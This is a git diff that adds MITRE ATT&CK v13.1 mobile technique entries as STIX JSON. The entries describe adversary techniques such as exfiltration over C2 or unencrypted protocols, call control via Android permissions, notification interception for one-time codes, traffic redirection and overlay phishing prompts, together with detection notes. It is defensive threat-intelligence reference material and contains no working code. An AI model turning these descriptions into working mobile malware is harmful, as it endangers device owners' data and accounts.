"2022-04-08T16:25:44.552Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exfiltration Over C2 Channel", + "x_mitre_detection": "Exfiltration over C2 channel can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "exfiltration", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172.json
new file mode 100644
index 0000000000000000000000000000000000000000..ed00b99ef36e84c63223b18bdd649efb8ccb11c4
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172.json
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--747e06fb-5a1d-4c83-9a58-883cef87ee6b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:49:53.301Z", + "name": "Exploitation for Privilege Escalation", + "description": "Adversaries may exploit software vulnerabilities in order to to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in an application, service, within the operating system software, or kernel itself to execute adversary-controlled code. Security constructions, such as permission levels, will often hinder access to information and use of certain techniques. Adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. \n\nWhen initially gaining access to a device, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and applications running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user- level permission to root permissions depending on the component that is vulnerable. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can potentially utilize device APIs to determine if a device has been rooted or jailbroken. 
Application vetting services could potentially determine if an application contains code designed to exploit vulnerabilities.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "created": "2017-10-25T14:48:29.405Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1404", + "external_id": "T1404" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html", + "external_id": "APP-26" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69.json new file mode 100644 index 0000000000000000000000000000000000000000..ebfc3ff701925c4914d859ab2201a7146901eedc --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69.json 
@@ -0,0 +1,84 @@ +{ + "type": "bundle", + "id": "bundle--13bb4ad6-7ab7-4e72-8093-1671dd1697ae", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-16T18:31:37.189Z", + "name": "Call Control", + "description": "Adversaries may make, forward, or block phone calls without user authorization. This could be used for adversary goals such as audio surveillance, blocking or forwarding calls from the device owner, or C2 communication.\n\nSeveral permissions may be used to programmatically control phone calls, including:\n\n* `ANSWER_PHONE_CALLS` - Allows the application to answer incoming phone calls(Citation: Android Permissions)\n* `CALL_PHONE` - Allows the application to initiate a phone call without going through the Dialer interface(Citation: Android Permissions)\n* `PROCESS_OUTGOING_CALLS` - Allows the application to see the number being dialed during an outgoing call with the option to redirect the call to a different number or abort the call altogether(Citation: Android Permissions)\n* `MANAGE_OWN_CALLS` - Allows a calling application which manages its own calls through the self-managed `ConnectionService` APIs(Citation: Android Permissions)\n* `BIND_TELECOM_CONNECTION_SERVICE` - Required permission when using a `ConnectionService`(Citation: Android Permissions)\n* `WRITE_CALL_LOG` - Allows an application to write to the device call log, potentially to hide malicious phone calls(Citation: Android Permissions)\n\nWhen granted some of these permissions, an application can make a phone call without opening the dialer first. However, if an application desires to simply redirect the user to the dialer with a phone number filled in, it can launch an Intent using `Intent.ACTION_DIAL`, which requires no specific permissions. 
This then requires the user to explicitly initiate the call or use some form of [Input Injection](https://attack.mitre.org/techniques/T1516) to programmatically initiate it.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_contributors": [ + "Gaetan van Diemen, ThreatFabric" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can view their default phone app in device settings. Users can review available call logs for irregularities, such as missing or unrecognized calls.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "created": "2021-09-20T13:42:20.824Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1616", + "external_id": "T1616" + }, + { + "source_name": "Android Permissions", + "description": "Google. (2021, August 11). Manifest.permission. 
Retrieved September 22, 2021.", + "url": "https://developer.android.com/reference/android/Manifest.permission" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-41.html", + "external_id": "APP-41" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-42.html", + "external_id": "CEL-42" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-36.html", + "external_id": "CEL-36" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-18.html", + "external_id": "CEL-18" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--37047267-3e56-453c-833e-d92b68118120.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--37047267-3e56-453c-833e-d92b68118120.json new file mode 100644 index 0000000000000000000000000000000000000000..638e0ee02b7776dbf1de63cdf6c76d8903cb1b0d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--37047267-3e56-453c-833e-d92b68118120.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--c3772b48-78cf-455b-98b8-7e32b8a36d47", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--37047267-3e56-453c-833e-d92b68118120", + "created": "2022-04-06T13:22:57.683Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1639.001", + "url": "https://attack.mitre.org/techniques/T1639/001" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-30" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). 
Adversaries may employ custom or publicly available encoding/compression algorithms (such as base64) or embed data within protocol headers and fields.", + "modified": "2022-04-06T13:23:10.087Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exfiltration Over Unencrypted Non-C2 Protocol", + "x_mitre_detection": "Exfiltration Over Alternative Protocols can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "exfiltration", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9.json new file mode 100644 index 0000000000000000000000000000000000000000..bfcb0521b77d238df450169e28b2985feaaff7b7 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--30e2a6c9-a3c5-429c-aaa8-edc6e64af1ff", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-16T18:27:42.752Z", + "name": "Broadcast Receivers", + "description": "Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Mobile operating systems have means to subscribe to events such as receiving an SMS message, device boot completion, or other device activities. \n\nAn intent is a message passed between Android applications or system components. Applications can register to receive broadcast intents at runtime, which are system-wide intents delivered to each app when certain events happen on the device, such as network changes or the user unlocking the screen. Malicious applications can then trigger certain actions within the app based on which broadcast intent was received. \n\nIn addition to Android system intents, malicious applications can register for intents broadcasted by other applications. This allows the malware to respond based on actions in other applications. This behavior typically indicates a more intimate knowledge, or potentially the targeting of specific devices, users, or applications. \n\nIn Android 8 (API level 26), broadcast intent behavior was changed, limiting the implicit intents that applications can register for in the manifest. In most cases, applications that register through the manifest will no longer receive the broadcasts. 
Now, applications must register context-specific broadcast receivers while the user is actively using the app.(Citation: Android Changes to System Broadcasts) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_contributors": [ + "Alex Hinchliffe, Palo Alto Networks" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services can detect which broadcast intents an application registers for and which permissions it requests. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "created": "2022-03-30T14:41:00.672Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1624/001", + "external_id": "T1624.001" + }, + { + "source_name": "Android Changes to System Broadcasts", + "description": "Google. (2019, December 27). Broadcasts Overview. Retrieved January 27, 2020.", + "url": "https://developer.android.com/guide/components/broadcasts#changes-system-broadcasts" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3911658a-6506-4deb-9ab4-595a51ae71ad.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3911658a-6506-4deb-9ab4-595a51ae71ad.json new file mode 100644 index 0000000000000000000000000000000000000000..7657c2376c5634c7fb827d9d3a563ed721b3b208 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3911658a-6506-4deb-9ab4-595a51ae71ad.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--72b54946-3c9d-479e-8d3d-56dac8ab37dd", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--3911658a-6506-4deb-9ab4-595a51ae71ad", + "created": "2017-10-25T14:48:16.650Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1436", + "url": "https://attack.mitre.org/techniques/T1436" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. \n\nThey may use commonly open ports such as\n\n* TCP:80 (HTTP)\n* TCP:443 (HTTPS)\n* TCP:25 (SMTP)\n* TCP/UDP:53 (DNS)\n\nThey may use the protocol associated with the port or a completely different protocol.", + "modified": "2022-04-06T15:40:47.556Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Commonly Used Port", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--393e8c12-a416-4575-ba90-19cc85656796.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--393e8c12-a416-4575-ba90-19cc85656796.json new file mode 100644 index 0000000000000000000000000000000000000000..f95a21bb3df0e455a702630596676190ef926e9a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--393e8c12-a416-4575-ba90-19cc85656796.json 
@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--03b172d0-b763-4fd9-928a-b9e77b2faf0c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--393e8c12-a416-4575-ba90-19cc85656796", + "created": "2017-10-25T14:48:26.104Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1439", + "url": "https://attack.mitre.org/techniques/T1439" + }, + { + "source_name": "mHealth", + "url": "https://experts.illinois.edu/en/publications/security-concerns-in-android-mhealth-apps", + "description": "D. He et al.. (2014). Security Concerns in Android mHealth Apps. Retrieved December 24, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-0" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-1" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "If network traffic between the mobile device and remote servers is unencrypted or is encrypted in an insecure manner, then an adversary positioned on the network can eavesdrop on communication.(Citation: mHealth)", + "modified": "2022-04-05T20:17:46.147Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Eavesdrop on Insecure Network Communication", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + 
"x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2.json new file mode 100644 index 0000000000000000000000000000000000000000..33928a68ebfa2e7dc846ad4c4a4a5ba565256812 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--2e8fc769-2a3a-4f1c-9315-a3531d4d215b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-15T16:26:05.050Z", + "name": "Access Notifications", + "description": "Adversaries may collect data within notifications sent by the operating system or other applications. Notifications may contain sensitive data such as one-time authentication codes sent over SMS, email, or other mediums. In the case of Credential Access, adversaries may attempt to intercept one-time code sent to the device. Adversaries can also dismiss notifications to prevent the user from noticing that the notification has arrived and can trigger action buttons contained within notifications.(Citation: ESET 2FA Bypass) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services can look for applications requesting the `BIND_NOTIFICATION_LISTENER_SERVICE` permission in a service declaration. Users can also inspect and modify the list of applications that have notification access through the device settings (e.g. Apps & notification -> Special app access -> Notification access). 
", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "created": "2019-09-15T15:26:08.183Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1517", + "external_id": "T1517" + }, + { + "source_name": "ESET 2FA Bypass", + "description": "Luk\u00e1\u0161 \u0160tefanko. (2019, June 17). Malware sidesteps Google permissions policy with new 2FA bypass technique. Retrieved September 15, 2019.", + "url": "https://www.welivesecurity.com/2019/06/17/malware-google-permissions-2fa-bypass/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3b0b604f-10db-41a0-b54c-493124d455b9.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3b0b604f-10db-41a0-b54c-493124d455b9.json new file mode 100644 index 0000000000000000000000000000000000000000..5f61efe557206256407300d78cdf10388c9698a5 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3b0b604f-10db-41a0-b54c-493124d455b9.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--711dac91-c675-4d46-82b9-58352938850a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--3b0b604f-10db-41a0-b54c-493124d455b9", + "created": "2017-10-25T14:48:14.982Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1410", + "url": "https://attack.mitre.org/techniques/T1410" + }, + { + "source_name": "Skycure-Profiles", + "url": "https://www.skycure.com/blog/malicious-profiles-the-sleeping-giant-of-ios-security/", + "description": "Yair Amit. (2013, March 12). Malicious Profiles - The Sleeping Giant of iOS Security. Retrieved December 22, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary may capture network traffic to and from the device to obtain credentials or other sensitive data, or redirect network traffic to flow through an adversary-controlled gateway to do the same.\n\nA malicious app could register itself as a VPN client on Android or iOS to gain access to network packets. However, on both platforms, the user must grant consent to the app to act as a VPN client, and on iOS the app requires a special entitlement that must be granted by Apple.\n\nAlternatively, if a malicious app is able to escalate operating system privileges, it may be able to use those privileges to gain access to network traffic.\n\nAn adversary could redirect network traffic to an adversary-controlled gateway by establishing a VPN connection or by manipulating the device's proxy settings. 
For example, Skycure (Citation: Skycure-Profiles) describes the ability to redirect network traffic by installing a malicious iOS Configuration Profile.\n\nIf applications encrypt their network traffic, sensitive data may not be accessible to an adversary, depending on the point of capture.", + "modified": "2022-04-15T17:52:24.123Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network Traffic Capture or Redirection", + "x_mitre_detection": "On both Android and iOS the user must grant consent to an app to act as a VPN. Both platforms also provide visual context to the user in the top status bar when a VPN connection is in place.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3dd58c80-4c2e-458c-9503-1b2cd273c4d2.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3dd58c80-4c2e-458c-9503-1b2cd273c4d2.json new file mode 100644 index 0000000000000000000000000000000000000000..4c02b58a83a70c2a45ff7cc98c1b0ec6691bdb1f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3dd58c80-4c2e-458c-9503-1b2cd273c4d2.json 
@@ -0,0 +1,114 @@ +{ + "type": "bundle", + "id": "bundle--4af85987-f026-4f22-93fb-c69fbf612d1f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--3dd58c80-4c2e-458c-9503-1b2cd273c4d2", + "created": "2017-10-25T14:48:34.407Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1411", + "url": "https://attack.mitre.org/techniques/T1411" + }, + { + "source_name": "Felt-PhishingOnMobileDevices", + "url": "http://w2spconf.com/2011/papers/felt-mobilephishing.pdf", + "description": "A.P. Felt and D. Wagner. (2011, May 26). Phishing on Mobile Devices. Retrieved August 25, 2016." + }, + { + "source_name": "Android Background", + "url": "https://developer.android.com/guide/components/activities/background-starts", + "description": "Android Developers. (n.d.). Restrictions on starting activities from the background. Retrieved September 18, 2019." + }, + { + "source_name": "Android-getRunningTasks", + "url": "https://developer.android.com/reference/android/app/ActivityManager.html#getRunningTasks%28int%29", + "description": "Android. (n.d.). ActivityManager getRunningTasks documentation. Retrieved January 19, 2017." + }, + { + "source_name": "Cloak and Dagger", + "url": "http://cloak-and-dagger.org/", + "description": "Fratantonio, Y., et al.. (2017). Cloak & Dagger. Retrieved September 18, 2019." + }, + { + "source_name": "Group IB Gustuff Mar 2019", + "url": "https://www.group-ib.com/blog/gustuff", + "description": "Group-IB. (2019, March 28). Group-IB uncovers Android Trojan named \u00abGustuff\u00bb capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications. Retrieved September 3, 2019." 
+ }, + { + "source_name": "eset-finance", + "url": "https://www.welivesecurity.com/2018/09/19/fake-finance-apps-google-play-target-around-world/", + "description": "Luk\u00e1\u0161 \u0160tefanko. (2016, July 7). Fake finance apps on Google Play target users from around the world. Retrieved September 24, 2018." + }, + { + "source_name": "Hassell-ExploitingAndroid", + "url": "https://conference.hitb.org/hitbsecconf2011kul/materials/D1T1%20-%20Riley%20Hassell%20-%20Exploiting%20Androids%20for%20Fun%20and%20Profit.pdf", + "description": "R. Hassell. (2011, October 12-13). Exploiting Androids for Fun and Profit. Retrieved October 10, 2019." + }, + { + "source_name": "XDA Bubbles", + "url": "https://www.xda-developers.com/android-q-system-alert-window-deprecate-bubbles/", + "description": "Rahman, M.. (2019, May 8). Bubbles in Android Q will fully replace the overlay API in a future Android version. Retrieved September 18, 2019." + }, + { + "source_name": "NowSecure Android Overlay", + "url": "https://www.nowsecure.com/blog/2017/05/25/android-overlay-malware-system-alert-window-permission/", + "description": "Ramirez, T.. (2017, May 25). \u2018SAW\u2019-ing through the UI: Android overlay malware and the System Alert Window permission explained. Retrieved September 18, 2019." + }, + { + "source_name": "ThreatFabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "ThreatFabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved September 18, 2019." + }, + { + "source_name": "StackOverflow-getRunningAppProcesses", + "url": "http://stackoverflow.com/questions/30619349/android-5-1-1-and-above-getrunningappprocesses-returns-my-application-packag", + "description": "Various. (n.d.). Android 5.1.1 and above - getRunningAppProcesses() returns my application package only. Retrieved January 19, 2017." 
+ }, + { + "source_name": "Skycure-Accessibility", + "url": "https://www.skycure.com/blog/accessibility-clickjacking/", + "description": "Yair Amit. (2016, March 3). \u201cAccessibility Clickjacking\u201d \u2013 The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved December 21, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-31" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Adversaries may mimic this functionality to prompt users for sensitive information.\n\nCompared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique\u2019s use.(Citation: Felt-PhishingOnMobileDevices)\n\nSpecific approaches to this technique include:\n\n### Impersonate the identity of a legitimate application\n\nA malicious application could impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and get installed on the device. The malicious app could then prompt the user for sensitive information.(Citation: eset-finance)\n\n### Display a prompt on top of a running legitimate application\n\nA malicious application could display a prompt on top of a running legitimate application to trick users into entering sensitive information into the malicious application rather than the legitimate application. 
Typically, the malicious application would need to know when the targeted application (and individual activity within the targeted application) is running in the foreground, so that the malicious application knows when to display its prompt. Android 5.0 and 5.1.1, respectively, increased the difficulty of determining the current foreground application through modifications to the `ActivityManager` API.(Citation: Android-getRunningTasks)(Citation: StackOverflow-getRunningAppProcesses). A malicious application can still abuse Android\u2019s accessibility features to determine which application is currently in the foreground.(Citation: ThreatFabric Cerberus) Approaches to display a prompt include:\n\n* A malicious application could start a new activity on top of a running legitimate application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.(Citation: Android Background)\n* A malicious application could create an application overlay window on top of a running legitimate application. Applications must hold the `SYSTEM_ALERT_WINDOW` permission to create overlay windows. This permission is handled differently than typical Android permissions, and at least under certain conditions is automatically granted to applications installed from the Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The `SYSTEM_ALERT_WINDOW` permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.(Citation: XDA Bubbles)\n\n### Fake device notifications\n\nA malicious application could send fake device notifications to the user. 
